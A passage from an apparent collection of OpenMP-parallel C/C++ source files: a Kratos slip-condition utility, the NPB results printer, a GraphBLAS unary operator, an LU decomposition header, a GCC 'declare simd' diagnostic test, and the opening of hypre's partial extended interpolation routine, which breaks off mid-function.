///@}
///@name Functions
///@{
///@}
///@name Kratos Classes
///@{
/**
* @brief Tools to apply slip conditions
* @detail A utility to rotate the local contributions of certain nodes to the system matrix, which is required to apply slip conditions in arbitrary directions.
*/
template<class TLocalMatrixType, class TLocalVectorType, class TValueType>
class FlowRateSlipUtility
: public CoordinateTransformationUtils<TLocalMatrixType,TLocalVectorType,TValueType>
{
public:
///@name Type Definitions
///@{
/// Pointer definition of FlowRateSlipUtility
KRATOS_CLASS_POINTER_DEFINITION(FlowRateSlipUtility);
typedef CoordinateTransformationUtils<TLocalMatrixType,TLocalVectorType,TValueType> BaseType;
typedef std::size_t SizeType;
typedef Node<3> NodeType;
typedef Geometry<NodeType> GeometryType;
///@}
///@name Life Cycle
///@{
/// Default constructor.
FlowRateSlipUtility() : BaseType(2,3,SLIP) {}
/// Destructor.
virtual ~FlowRateSlipUtility() {}
///@}
///@name Operators
///@{
///@}
///@name Operations
///@{
/**
* @brief Apply slip boundary conditions to the rotated local contributions.
* @detail This function takes the local system contributions rotated so each
* node's velocities are expressed using a base oriented with its normal
* and imposes that the normal velocity is equal to the mesh velocity in
* the normal direction.
* @param rLocalMatrix A reference to the LHS local matrix
* @param rLocalVector A reference to the RHS local vector
* @param rGeometry A reference to the geometry of the element or condition
*/
virtual void ApplySlipCondition(
TLocalMatrixType& rLocalMatrix,
TLocalVectorType& rLocalVector,
GeometryType& rGeometry) const override
{
const SizeType LocalSize = rLocalVector.size(); // We expect this to work both with elements and conditions
if (LocalSize > 0)
{
for (SizeType it_node = 0; it_node < rGeometry.PointsNumber(); ++it_node)
{
if (this->IsSlip(rGeometry[it_node]))
{
// We fix the first dof (normal velocity) for each rotated block
SizeType j = it_node * BaseType::GetBlockSize();
array_1d<double,3> vel = rGeometry[it_node].FastGetSolutionStepValue(MOMENTUM);
array_1d<double,3> n = rGeometry[it_node].FastGetSolutionStepValue(NORMAL);
this->Normalize(n);
for (SizeType i = 0; i < j; ++i) // Skip term (i,i)
{
rLocalMatrix(i,j) = 0.0;
rLocalMatrix(j,i) = 0.0;
}
for (SizeType i = j+1; i < LocalSize; ++i)
{
rLocalMatrix(i,j) = 0.0;
rLocalMatrix(j,i) = 0.0;
}
rLocalVector(j) = - inner_prod(n, vel);
rLocalMatrix(j,j) = 1.0;
}
}
}
}
/**
* @brief RHS only version of ApplySlipCondition
* @param rLocalVector A reference to the RHS local vector
* @param rGeometry A reference to the geometry of the element or condition
*/
virtual void ApplySlipCondition(
TLocalVectorType& rLocalVector,
GeometryType& rGeometry) const override
{
if (rLocalVector.size() > 0)
{
for (SizeType it_node = 0; it_node < rGeometry.PointsNumber(); ++it_node)
{
if (this->IsSlip(rGeometry[it_node]))
{
// We fix the first dof (normal velocity) for each rotated block
SizeType j = it_node * BaseType::GetBlockSize();
array_1d<double,3> vel = rGeometry[it_node].FastGetSolutionStepValue(MOMENTUM);
array_1d<double,3> n = rGeometry[it_node].FastGetSolutionStepValue(NORMAL);
this->Normalize(n);
rLocalVector[j] = inner_prod(n, vel);
}
}
}
}
/**
* @brief Transform nodal velocities to the rotated coordinates (aligned with each node's normal)
* @param rModelPart A reference to the model part
* @see RecoverVelocities
*/
virtual void RotateVelocities(ModelPart& rModelPart) const override
{
TLocalVectorType vel(BaseType::GetDomainSize());
TLocalVectorType tmp(BaseType::GetDomainSize());
ModelPart::NodeIterator it_begin = rModelPart.NodesBegin();
#pragma omp parallel for firstprivate(vel, tmp)
for(int i = 0; i < static_cast<int>(rModelPart.Nodes().size()); ++i)
{
ModelPart::NodeIterator it_node = it_begin + i;
if (this->IsSlip(*it_node))
{
// For shallow water problems, domain size is always 2
BoundedMatrix<double,2,2> rot;
BaseType::LocalRotationOperatorPure(rot, *it_node);
array_1d<double,3>& r_velocity = it_node->FastGetSolutionStepValue(MOMENTUM);
for(SizeType i = 0; i < 2; i++) {
vel[i] = r_velocity[i];
}
noalias(tmp) = prod(rot, vel);
for(SizeType i = 0; i < 2; i++) {
r_velocity[i] = tmp[i];
}
}
}
}
/**
* Transform nodal velocities from the rotated system to the original one
* @param rModelPart A reference to the model part
* @see RotateVelocities
*/
virtual void RecoverVelocities(ModelPart& rModelPart) const override
{
TLocalVectorType vel(BaseType::GetDomainSize());
TLocalVectorType tmp(BaseType::GetDomainSize());
ModelPart::NodeIterator it_begin = rModelPart.NodesBegin();
#pragma omp parallel for firstprivate(vel, tmp)
for(int i = 0; i<static_cast<int>(rModelPart.Nodes().size()); ++i)
{
ModelPart::NodeIterator it_node = it_begin + i;
if( this->IsSlip(*it_node) )
{
// For shallow water problems, domain size is always 2
BoundedMatrix<double,2,2> rot;
BaseType::LocalRotationOperatorPure(rot,*it_node);
array_1d<double,3>& r_velocity = it_node->FastGetSolutionStepValue(MOMENTUM);
for(SizeType i = 0; i < 2; i++) {
vel[i] = r_velocity[i];
}
noalias(tmp) = prod(trans(rot),vel);
for(SizeType i = 0; i < 2; i++) {
r_velocity[i] = tmp[i];
}
}
}
}
///@}
///@name Access
///@{
///@}
///@name Inquiry
///@{
///@}
///@name Input and output
///@{
/**
* Turn back information as a string.
*/
virtual std::string Info() const override
{
std::stringstream buffer;
buffer << "FlowRateSlipUtility";
return buffer.str();
}
/**
* Print information about this object.
*/
virtual void PrintInfo(std::ostream& rOStream) const override
{
rOStream << "FlowRateSlipUtility";
}
///@}
///@name Friends
///@{
///@}
private:
///@name Un accessible methods
///@{
/// Assignment operator.
// FlowRateSlipUtility& operator=(FlowRateSlipUtility const& rOther) {}
/// Copy constructor.
// FlowRateSlipUtility(FlowRateSlipUtility const& rOther) {}
///@}
}; // Class FlowRateSlipUtility
///@}
///@name Type Definitions
///@{
///@}
///@name Input and output
///@{
/// input stream function
template<class TLocalMatrixType, class TLocalVectorType, class TValueType>
inline std::istream& operator >> (
std::istream& rIStream,
FlowRateSlipUtility<TLocalMatrixType, TLocalVectorType,TValueType>& rThis)
{
return rIStream;
}
/// output stream function
template<class TLocalMatrixType, class TLocalVectorType, class TValueType>
inline std::ostream& operator << (
std::ostream& rOStream,
const FlowRateSlipUtility<TLocalMatrixType, TLocalVectorType,TValueType>& rThis)
{
rThis.PrintInfo(rOStream);
rOStream << std::endl;
rThis.PrintData(rOStream);
return rOStream;
}
///@}
///@} addtogroup block
} // namespace Kratos.
#endif // KRATOS_FLOW_RATE_SLIP_UTILITY_H_INCLUDED defined
|
c_print_results.c | /*****************************************************************/
/****** C _ P R I N T _ R E S U L T S ******/
/*****************************************************************/
#include <stdlib.h>
#include <stdio.h>
#ifdef _OPENMP
#include <omp.h>
#endif
void c_print_results( char *name,
char class,
int n1,
int n2,
int n3,
int niter,
double t,
double mops,
char *optype,
int passed_verification,
char *npbversion,
char *compiletime,
char *cc,
char *clink,
char *c_lib,
char *c_inc,
char *cflags,
char *clinkflags )
{
int num_threads, max_threads;
max_threads = 1;
num_threads = 1;
/* figure out number of threads used */
#ifdef _OPENMP
max_threads = omp_get_max_threads();
#pragma omp parallel shared(num_threads)
{
#pragma omp master
num_threads = omp_get_num_threads();
}
#endif
printf( "\n\n %s Benchmark Completed\n", name );
printf( " Class = %c\n", class );
if( n3 == 0 ) {
long nn = n1;
if ( n2 != 0 ) nn *= n2;
printf( " Size = %12ld\n", nn ); /* as in IS */
}
else
printf( " Size = %4dx%4dx%4d\n", n1,n2,n3 );
printf( " Iterations = %12d\n", niter );
printf( " Time in seconds = %12.2f\n", t );
printf( " Total threads = %12d\n", num_threads);
printf( " Avail threads = %12d\n", max_threads);
if (num_threads != max_threads)
printf( " Warning: Threads used differ from threads available\n");
printf( " Mop/s total = %12.2f\n", mops );
printf( " Mop/s/thread = %12.2f\n",
mops/(double)num_threads );
printf( " Operation type = %24s\n", optype);
if( passed_verification < 0 )
printf( " Verification = NOT PERFORMED\n" );
else if( passed_verification )
printf( " Verification = SUCCESSFUL\n" );
else
printf( " Verification = UNSUCCESSFUL\n" );
printf( " Version = %12s\n", npbversion );
printf( " Compile date = %12s\n", compiletime );
printf( "\n Compile options:\n" );
printf( " CC = %s\n", cc );
printf( " CLINK = %s\n", clink );
printf( " C_LIB = %s\n", c_lib );
printf( " C_INC = %s\n", c_inc );
printf( " CFLAGS = %s\n", cflags );
printf( " CLINKFLAGS = %s\n", clinkflags );
printf( "\n\n" );
printf( " Please send all errors/feedbacks to:\n\n" );
printf( " NPB Development Team\n" );
printf( " npb@nas.nasa.gov\n\n" );
/* printf( " Please send the results of this run to:\n\n" );
printf( " NPB Development Team\n" );
printf( " Internet: npb@nas.nasa.gov\n \n" );
printf( " If email is not available, send this to:\n\n" );
printf( " MS T27A-1\n" );
printf( " NASA Ames Research Center\n" );
printf( " Moffett Field, CA 94035-1000\n\n" );
printf( " Fax: 650-604-3957\n\n" ); */
}
|
GB_unaryop__abs_fp32_bool.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__abs_fp32_bool
// op(A') function: GB_tran__abs_fp32_bool
// C type: float
// A type: bool
// cast: float cij = (float) aij
// unaryop: cij = fabsf (aij)
#define GB_ATYPE \
bool
#define GB_CTYPE \
float
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
bool aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = fabsf (x) ;
// casting
#define GB_CASTING(z, x) \
float z = (float) x ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_ABS || GxB_NO_FP32 || GxB_NO_BOOL)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__abs_fp32_bool
(
float *restrict Cx,
const bool *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__abs_fp32_bool
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t **Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
lu_decomposition.h | /**
* @file lu_decomposition.h
* @author [Krishna Vedala](https://github.com/kvedala)
* @brief Functions associated with [LU
* Decomposition](https://en.wikipedia.org/wiki/LU_decomposition)
* of a square matrix.
*/
#pragma once
#include <iostream>
#include <valarray>
#include <vector>
#ifdef _OPENMP
#include <omp.h>
#endif
/** Define matrix type as a `std::vector` of `std::valarray` */
template <typename T>
using matrix = std::vector<std::valarray<T>>;
/** Perform LU decomposition on matrix
* \param[in] A matrix to decompose
* \param[out] L output L matrix
* \param[out] U output U matrix
* \returns 0 if no errors
* \returns negative if error occurred
*/
template <typename T>
int lu_decomposition(const matrix<T> &A, matrix<double> *L, matrix<double> *U)
{
int row, col, j;
int mat_size = A.size();
if (mat_size != A[0].size())
{
// check matrix is a square matrix
std::cerr << "Not a square matrix!\n";
return -1;
}
// regularize each row
for (row = 0; row < mat_size; row++)
{
// Upper triangular matrix
#ifdef _OPENMP
#pragma omp for
#endif
for (col = row; col < mat_size; col++)
{
// Summation of L[i,j] * U[j,k]
double lu_sum = 0.;
for (j = 0; j < row; j++)
{
lu_sum += L[0][row][j] * U[0][j][col];
}
// Evaluate U[i,k]
U[0][row][col] = A[row][col] - lu_sum;
}
// Lower triangular matrix
#ifdef _OPENMP
#pragma omp for
#endif
for (col = row; col < mat_size; col++)
{
if (row == col)
{
L[0][row][col] = 1.;
continue;
}
// Summation of L[i,j] * U[j,k]
double lu_sum = 0.;
for (j = 0; j < row; j++)
{
lu_sum += L[0][col][j] * U[0][j][row];
}
// Evaluate U[i,k]
L[0][col][row] = (A[col][row] - lu_sum) / U[0][row][row];
}
}
return 0;
}
/**
* Compute determinant of an NxN square matrix using LU decomposition.
* Using LU decomposition, the determinant is given by the product of diagonal
* elements of matrices L and U.
*
* @tparam T datatype of input matrix - int, unsigned int, double, etc
* @param A input square matrix
* @return determinant of matrix A
*/
template <typename T>
double determinant_lu(const matrix<T> &A)
{
matrix<double> L(A.size(), std::valarray<double>(A.size()));
matrix<double> U(A.size(), std::valarray<double>(A.size()));
if (lu_decomposition(A, &L, &U) < 0)
{
return 0;
}
double result = 1.f;
for (size_t i = 0; i < A.size(); i++)
{
result *= L[i][i] * U[i][i];
}
return result;
}
|
declare-simd-4.c | /* { dg-do compile } */
/* { dg-options "-fopenmp-simd" } */
#pragma omp declare simd linear(a:1 + b) uniform(b) /* { dg-error ".linear. clause step .b \\+ 1. is neither constant nor a parameter" } */
int f1 (int a, int b);
#pragma omp declare simd linear(a:b + 1) uniform(b) /* { dg-error ".linear. clause step .b \\+ 1. is neither constant nor a parameter" } */
int f2 (int a, int b);
#pragma omp declare simd linear(a:2 * b) uniform(b) /* { dg-error ".linear. clause step .b \\* 2. is neither constant nor a parameter" } */
int f3 (int a, int b);
#pragma omp declare simd linear(a:b) /* { dg-error ".linear. clause step is a parameter .b. not specified in .uniform. clause" } */
int f4 (int a, int b);
#pragma omp declare simd linear(a:b) linear(b:1) /* { dg-error ".linear. clause step is a parameter .b. not specified in .uniform. clause" } */
int f5 (int a, int b);
#pragma omp declare simd linear(a:5 + 2 * 3)
int f6 (int a, int b);
const int c = 5;
#pragma omp declare simd linear(a:c) /* { dg-error ".linear. clause step .c. is neither constant nor a parameter" } */
int f7 (int a, int b);
#pragma omp declare simd linear(a:2 * c + 1) /* { dg-error ".linear. clause step .\[^\n\r]*. is neither constant nor a parameter" } */
int f8 (int a, int b);
#pragma omp declare simd linear(a:0.5) /* { dg-error ".linear. clause step expression must be integral" } */
int f9 (int a, int b);
|
partial.c | /******************************************************************************
* Copyright 1998-2019 Lawrence Livermore National Security, LLC and other
* HYPRE Project Developers. See the top-level COPYRIGHT file for details.
*
* SPDX-License-Identifier: (Apache-2.0 OR MIT)
******************************************************************************/
#include "_hypre_parcsr_ls.h"
#include "aux_interp.h"
/*---------------------------------------------------------------------------
* hypre_BoomerAMGBuildPartialExtPIInterp
* Comment:
*--------------------------------------------------------------------------*/
HYPRE_Int
hypre_BoomerAMGBuildPartialExtPIInterp(hypre_ParCSRMatrix *A, HYPRE_Int *CF_marker,
hypre_ParCSRMatrix *S, HYPRE_BigInt *num_cpts_global,
HYPRE_BigInt *num_old_cpts_global,
HYPRE_Int num_functions, HYPRE_Int *dof_func, HYPRE_Int debug_flag,
HYPRE_Real trunc_factor, HYPRE_Int max_elmts,
hypre_ParCSRMatrix **P_ptr)
{
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_PARTIAL_INTERP] -= hypre_MPI_Wtime();
#endif
/* Communication Variables */
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
HYPRE_Int my_id, num_procs;
/* Variables to store input variables */
hypre_CSRMatrix *A_diag = hypre_ParCSRMatrixDiag(A);
HYPRE_Real *A_diag_data = hypre_CSRMatrixData(A_diag);
HYPRE_Int *A_diag_i = hypre_CSRMatrixI(A_diag);
HYPRE_Int *A_diag_j = hypre_CSRMatrixJ(A_diag);
hypre_CSRMatrix *A_offd = hypre_ParCSRMatrixOffd(A);
HYPRE_Real *A_offd_data = hypre_CSRMatrixData(A_offd);
HYPRE_Int *A_offd_i = hypre_CSRMatrixI(A_offd);
HYPRE_Int *A_offd_j = hypre_CSRMatrixJ(A_offd);
/*HYPRE_Int num_cols_A_offd = hypre_CSRMatrixNumCols(A_offd);
HYPRE_Int *col_map_offd = hypre_ParCSRMatrixColMapOffd(A);*/
HYPRE_Int n_fine = hypre_CSRMatrixNumRows(A_diag);
HYPRE_BigInt col_1 = hypre_ParCSRMatrixFirstRowIndex(A);
HYPRE_Int local_numrows = hypre_CSRMatrixNumRows(A_diag);
HYPRE_BigInt col_n = col_1 + (HYPRE_BigInt)local_numrows;
HYPRE_BigInt total_global_cpts, my_first_cpt;
/* Variables to store strong connection matrix info */
hypre_CSRMatrix *S_diag = hypre_ParCSRMatrixDiag(S);
HYPRE_Int *S_diag_i = hypre_CSRMatrixI(S_diag);
HYPRE_Int *S_diag_j = hypre_CSRMatrixJ(S_diag);
hypre_CSRMatrix *S_offd = hypre_ParCSRMatrixOffd(S);
HYPRE_Int *S_offd_i = hypre_CSRMatrixI(S_offd);
HYPRE_Int *S_offd_j = hypre_CSRMatrixJ(S_offd);
/* Interpolation matrix P */
hypre_ParCSRMatrix *P;
hypre_CSRMatrix *P_diag;
hypre_CSRMatrix *P_offd;
HYPRE_Real *P_diag_data = NULL;
HYPRE_Int *P_diag_i, *P_diag_j = NULL;
HYPRE_Real *P_offd_data = NULL;
HYPRE_Int *P_offd_i, *P_offd_j = NULL;
/*HYPRE_Int *col_map_offd_P = NULL;*/
HYPRE_Int P_diag_size;
HYPRE_Int P_offd_size;
/*HYPRE_Int *P_marker = NULL;
HYPRE_Int *P_marker_offd = NULL;*/
HYPRE_Int *CF_marker_offd = NULL;
HYPRE_Int *tmp_CF_marker_offd = NULL;
HYPRE_Int *dof_func_offd = NULL;
/* Full row information for columns of A that are off diag*/
hypre_CSRMatrix *A_ext;
HYPRE_Real *A_ext_data;
HYPRE_Int *A_ext_i;
HYPRE_BigInt *A_ext_j;
HYPRE_Int *fine_to_coarse = NULL;
HYPRE_BigInt *fine_to_coarse_offd = NULL;
HYPRE_Int *old_coarse_to_fine = NULL;
HYPRE_Int full_off_procNodes;
hypre_CSRMatrix *Sop;
HYPRE_Int *Sop_i;
HYPRE_BigInt *Sop_j;
HYPRE_Int sgn;
/* Variables to keep count of interpolatory points */
/*HYPRE_Int jj_counter, jj_counter_offd;
HYPRE_Int jj_begin_row, jj_end_row;
HYPRE_Int jj_begin_row_offd = 0;
HYPRE_Int jj_end_row_offd = 0;
HYPRE_Int coarse_counter, coarse_counter_offd; */
HYPRE_Int n_coarse_old;
HYPRE_BigInt total_old_global_cpts;
/* Interpolation weight variables */
HYPRE_Real sum, diagonal, distribute;
/*HYPRE_Int strong_f_marker = -2;*/
/* Loop variables */
/*HYPRE_Int index;*/
HYPRE_Int cnt, old_cnt;
HYPRE_Int start_indexing = 0;
HYPRE_Int i;
/*HYPRE_Int i, ii, i1, i2, j, jj, kk, k1, jj1;*/
/* Definitions */
HYPRE_Real zero = 0.0;
HYPRE_Real one = 1.0;
HYPRE_Real wall_time;
HYPRE_Int max_num_threads;
HYPRE_Int *P_diag_array = NULL;
HYPRE_Int *P_offd_array = NULL;
hypre_ParCSRCommPkg *extend_comm_pkg = NULL;
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
/* BEGIN */
hypre_MPI_Comm_size(comm, &num_procs);
hypre_MPI_Comm_rank(comm, &my_id);
max_num_threads = hypre_NumThreads();
my_first_cpt = num_cpts_global[0];
/*my_first_old_cpt = num_old_cpts_global[0];*/
n_coarse_old = (HYPRE_Int)(num_old_cpts_global[1] - num_old_cpts_global[0]);
/*n_coarse = num_cpts_global[1] - num_cpts_global[0];*/
if (my_id == (num_procs - 1))
{
total_global_cpts = num_cpts_global[1];
total_old_global_cpts = num_old_cpts_global[1];
}
hypre_MPI_Bcast(&total_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
hypre_MPI_Bcast(&total_old_global_cpts, 1, HYPRE_MPI_BIG_INT, num_procs - 1, comm);
if (!comm_pkg)
{
hypre_MatvecCommPkgCreate(A);
comm_pkg = hypre_ParCSRMatrixCommPkg(A);
}
/* Set up off processor information (specifically for neighbors of
* neighbors */
full_off_procNodes = 0;
if (num_procs > 1)
{
if (hypre_exchange_interp_data(
&CF_marker_offd, &dof_func_offd, &A_ext, &full_off_procNodes, &Sop, &extend_comm_pkg,
A, CF_marker, S, num_functions, dof_func, 1))
{
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_EXTENDED_I_INTERP] += hypre_MPI_Wtime();
#endif
return hypre_error_flag;
}
A_ext_i = hypre_CSRMatrixI(A_ext);
A_ext_j = hypre_CSRMatrixBigJ(A_ext);
A_ext_data = hypre_CSRMatrixData(A_ext);
Sop_i = hypre_CSRMatrixI(Sop);
Sop_j = hypre_CSRMatrixBigJ(Sop);
}
/*-----------------------------------------------------------------------
* First Pass: Determine size of P and fill in fine_to_coarse mapping.
*-----------------------------------------------------------------------*/
/*-----------------------------------------------------------------------
* Intialize counters and allocate mapping vector.
*-----------------------------------------------------------------------*/
P_diag_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
P_offd_i = hypre_CTAlloc(HYPRE_Int, n_coarse_old + 1, HYPRE_MEMORY_HOST);
if (n_fine)
{
old_coarse_to_fine = hypre_CTAlloc(HYPRE_Int, n_coarse_old, HYPRE_MEMORY_HOST);
fine_to_coarse = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST);
/*P_marker = hypre_CTAlloc(HYPRE_Int, n_fine); */
}
if (full_off_procNodes)
{
/*P_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes);*/
fine_to_coarse_offd = hypre_CTAlloc(HYPRE_BigInt, full_off_procNodes, HYPRE_MEMORY_HOST);
tmp_CF_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST);
}
/*hypre_initialize_vecs(n_fine, full_off_procNodes, fine_to_coarse,
fine_to_coarse_offd, P_marker, P_marker_offd,
tmp_CF_marker_offd);*/
for (i = 0; i < full_off_procNodes; i++)
{
fine_to_coarse_offd[i] = -1;
tmp_CF_marker_offd[i] = -1;
}
cnt = 0;
old_cnt = 0;
for (i = 0; i < n_fine; i++)
{
fine_to_coarse[i] = -1;
if (CF_marker[i] == 1)
{
fine_to_coarse[i] = cnt++;
old_coarse_to_fine[old_cnt++] = i;
}
else if (CF_marker[i] == -2)
{
old_coarse_to_fine[old_cnt++] = i;
}
}
P_diag_array = hypre_CTAlloc(HYPRE_Int, max_num_threads + 1, HYPRE_MEMORY_HOST);
P_offd_array = hypre_CTAlloc(HYPRE_Int, max_num_threads + 1, HYPRE_MEMORY_HOST);
/*-----------------------------------------------------------------------
* Loop over fine grid.
*-----------------------------------------------------------------------*/
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel private(i, diagonal, distribute, sgn, sum)
#endif
{
HYPRE_Int ii, jj_counter, jj_counter_offd, jj, kk, i1, i2, k1, jj1;
HYPRE_BigInt big_k1;
HYPRE_Int loc_col, jj_begin_row, jj_begin_row_offd;
HYPRE_Int jj_end_row, jj_end_row_offd, strong_f_marker;
HYPRE_Int size, rest, ne, ns;
HYPRE_Int num_threads, my_thread_num;
HYPRE_Int *P_marker = NULL;
HYPRE_Int *P_marker_offd = NULL;
strong_f_marker = -2;
num_threads = hypre_NumActiveThreads();
my_thread_num = hypre_GetThreadNum();
size = n_coarse_old / num_threads;
rest = n_coarse_old - size * num_threads;
if (my_thread_num < rest)
{
ns = my_thread_num * (size + 1);
ne = (my_thread_num + 1) * (size + 1);
}
else
{
ns = my_thread_num * size + rest;
ne = (my_thread_num + 1) * size + rest;
}
if (n_fine) { P_marker = hypre_CTAlloc(HYPRE_Int, n_fine, HYPRE_MEMORY_HOST); }
for (ii = 0; ii < n_fine; ii++)
{
P_marker[ii] = -1;
}
if (full_off_procNodes) { P_marker_offd = hypre_CTAlloc(HYPRE_Int, full_off_procNodes, HYPRE_MEMORY_HOST); }
for (ii = 0; ii < full_off_procNodes; ii++)
{
P_marker_offd[ii] = -1;
}
/*coarse_counter = 0;
coarse_counter_offd = 0;*/
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
for (ii = ns; ii < ne; ii++)
{
jj_begin_row = jj_counter;
jj_begin_row_offd = jj_counter_offd;
/*P_diag_i[ii] = jj_counter;
if (num_procs > 1)
P_offd_i[ii] = jj_counter_offd;*/
i = old_coarse_to_fine[ii];
if (CF_marker[i] > 0)
{
jj_counter++;
/*coarse_counter++;*/
}
/*--------------------------------------------------------------------
* If i is an F-point, interpolation is from the C-points that
* strongly influence i, or C-points that stronly influence F-points
* that strongly influence i.
*--------------------------------------------------------------------*/
else if (CF_marker[i] == -2)
{
for (jj = S_diag_i[i]; jj < S_diag_i[i + 1]; jj++)
{
i1 = S_diag_j[jj];
if (CF_marker[i1] > 0)
{
/* i1 is a C point */
if (P_marker[i1] < jj_begin_row)
{
P_marker[i1] = jj_counter;
jj_counter++;
}
}
else if (CF_marker[i1] != -3)
{
/* i1 is a F point, loop through it's strong neighbors */
for (kk = S_diag_i[i1]; kk < S_diag_i[i1 + 1]; kk++)
{
k1 = S_diag_j[kk];
if (CF_marker[k1] > 0)
{
if (P_marker[k1] < jj_begin_row)
{
P_marker[k1] = jj_counter;
jj_counter++;
}
}
}
if (num_procs > 1)
{
for (kk = S_offd_i[i1]; kk < S_offd_i[i1 + 1]; kk++)
{
k1 = S_offd_j[kk];
if (CF_marker_offd[k1] > 0)
{
if (P_marker_offd[k1] < jj_begin_row_offd)
{
tmp_CF_marker_offd[k1] = 1;
P_marker_offd[k1] = jj_counter_offd;
jj_counter_offd++;
}
}
}
}
}
}
/* Look at off diag strong connections of i */
if (num_procs > 1)
{
for (jj = S_offd_i[i]; jj < S_offd_i[i + 1]; jj++)
{
i1 = S_offd_j[jj];
if (CF_marker_offd[i1] > 0)
{
if (P_marker_offd[i1] < jj_begin_row_offd)
{
tmp_CF_marker_offd[i1] = 1;
P_marker_offd[i1] = jj_counter_offd;
jj_counter_offd++;
}
}
else if (CF_marker_offd[i1] != -3)
{
/* F point; look at neighbors of i1. Sop contains global col
* numbers and entries that could be in S_diag or S_offd or
* neither. */
for (kk = Sop_i[i1]; kk < Sop_i[i1 + 1]; kk++)
{
big_k1 = Sop_j[kk];
if (big_k1 >= col_1 && big_k1 < col_n)
{
/* In S_diag */
loc_col = (HYPRE_Int)(big_k1 - col_1);
if (P_marker[loc_col] < jj_begin_row)
{
P_marker[loc_col] = jj_counter;
jj_counter++;
}
}
else
{
loc_col = -(HYPRE_Int)big_k1 - 1;
if (P_marker_offd[loc_col] < jj_begin_row_offd)
{
P_marker_offd[loc_col] = jj_counter_offd;
tmp_CF_marker_offd[loc_col] = 1;
jj_counter_offd++;
}
}
}
}
}
}
}
P_diag_array[my_thread_num] = jj_counter;
P_offd_array[my_thread_num] = jj_counter_offd;
}
#ifdef HYPRE_USING_OPENMP
#pragma omp barrier
#endif
if (my_thread_num == 0)
{
if (debug_flag == 4)
{
wall_time = time_getWallclockSeconds() - wall_time;
hypre_printf("Proc = %d determine structure %f\n",
my_id, wall_time);
fflush(NULL);
}
/*-----------------------------------------------------------------------
* Allocate arrays.
*-----------------------------------------------------------------------*/
if (debug_flag == 4) { wall_time = time_getWallclockSeconds(); }
for (i = 0; i < max_num_threads; i++)
{
P_diag_array[i + 1] += P_diag_array[i];
P_offd_array[i + 1] += P_offd_array[i];
}
P_diag_size = P_diag_array[max_num_threads];
P_offd_size = P_offd_array[max_num_threads];
if (P_diag_size)
{
P_diag_j = hypre_CTAlloc(HYPRE_Int, P_diag_size, HYPRE_MEMORY_HOST);
P_diag_data = hypre_CTAlloc(HYPRE_Real, P_diag_size, HYPRE_MEMORY_HOST);
}
if (P_offd_size)
{
P_offd_j = hypre_CTAlloc(HYPRE_Int, P_offd_size, HYPRE_MEMORY_HOST);
P_offd_data = hypre_CTAlloc(HYPRE_Real, P_offd_size, HYPRE_MEMORY_HOST);
}
P_diag_i[n_coarse_old] = P_diag_size;
P_offd_i[n_coarse_old] = P_offd_size;
/* Fine to coarse mapping */
if (num_procs > 1)
{
hypre_big_insert_new_nodes(comm_pkg, extend_comm_pkg, fine_to_coarse,
full_off_procNodes, my_first_cpt,
fine_to_coarse_offd);
}
}
for (i = 0; i < n_fine; i++)
{
P_marker[i] = -1;
}
for (i = 0; i < full_off_procNodes; i++)
{
P_marker_offd[i] = -1;
}
#ifdef HYPRE_USING_OPENMP
#pragma omp barrier
#endif
jj_counter = start_indexing;
jj_counter_offd = start_indexing;
if (my_thread_num)
{
jj_counter = P_diag_array[my_thread_num - 1];
jj_counter_offd = P_offd_array[my_thread_num - 1];
}
/*-----------------------------------------------------------------------
* Loop over fine grid points.
*-----------------------------------------------------------------------*/
for (ii = ns; ii < ne; ii++)
{
jj_begin_row = jj_counter;
jj_begin_row_offd = jj_counter_offd;
P_diag_i[ii] = jj_counter;
P_offd_i[ii] = jj_counter_offd;
i = old_coarse_to_fine[ii];
/*--------------------------------------------------------------------
* If i is a c-point, interpolation is the identity.
*--------------------------------------------------------------------*/
if (CF_marker[i] > 0)
{
P_diag_j[jj_counter] = fine_to_coarse[i];
P_diag_data[jj_counter] = one;
jj_counter++;
}
